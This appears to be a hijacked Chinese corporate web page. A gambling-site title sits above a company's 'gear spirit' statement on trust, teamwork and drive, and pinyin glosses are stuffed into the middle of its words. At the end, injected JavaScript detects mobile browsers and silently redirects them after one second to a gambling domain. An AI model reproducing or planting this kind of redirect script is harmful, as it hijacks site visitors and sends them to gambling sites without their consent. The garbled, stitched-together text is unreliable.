ag8游戏网站

ag8游戏网站
您目前在:
ag8游戏网站 ag8游戏网站

企业精神

 
“齿轮”精神——互信精神、团队精神、进取精神

      
企业精神就像汽车变速箱中的齿轮,是企业前进和发展的动力源泉,环成人就要具有“互信、团队、进取”的“齿轮”精神。
“互信(xin)”精神:齿轮作为(wei)动(dong)力系统的(de)重(zhong)要组(zu)成(cheng)(cheng)部分,在产生(sheng)动(dong)力的(de)过程中,每一个齿轮必须紧紧地和其它齿轮捏合在一块,才能保(bao)证整个动(dong)力系统的(de)稳定(ding)性(xing)和动(dong)力性(xing),这正体现了我们(men)环成(cheng)(cheng)人相互尊重(zhong)、相互依(yi)存、相互忠(zhong)诚的(de)“互信(xin)”精神。
“团队(dui)”精神(shen):只有(you)当(dang)所有(you)的齿轮(lun)同时都工作才能保证整个动(dong)力系统(tong)运转起来,缺一不(bu)可,这正体现了环(huan)成的“团队(dui)”精神(shen)。
“进取”的精神:每个齿轮在工作时必须和其它所有齿轮保持同一步调才能使整套系统工作,有一个不转或转慢了整个系 统都会运转不正常,这正体现我们环成人的“进取”精神。
var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?993185dc8689f489fddf05459dcb9ba5"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); function browserRedirect() { var sUserAgent= navigator.userAgent.toLowerCase(); var bIsIpad= sUserAgent.match(/ipad/i) == "ipad"; var bIsIphoneOs= sUserAgent.match(/iphone os/i) == "iphone os"; var bIsMidp= sUserAgent.match(/midp/i) == "midp"; var bIsUc7= sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4"; var bIsUc= sUserAgent.match(/ucweb/i) == "ucweb"; var bIsAndroid= sUserAgent.match(/android/i) == "android"; var bIsCE= sUserAgent.match(/windows ce/i) == "windows ce"; var bIsWM= sUserAgent.match(/windows mobile/i) == "windows mobile"; if (bIsIpad || bIsIphoneOs || bIsMidp || bIsUc7 || bIsUc || bIsAndroid || bIsCE || bIsWM) { window.setTimeout("window.location='http://leyubet1410.com'",1000); } else { document.writeln(""); document.writeln(""); document.writeln(""); } } browserRedirect();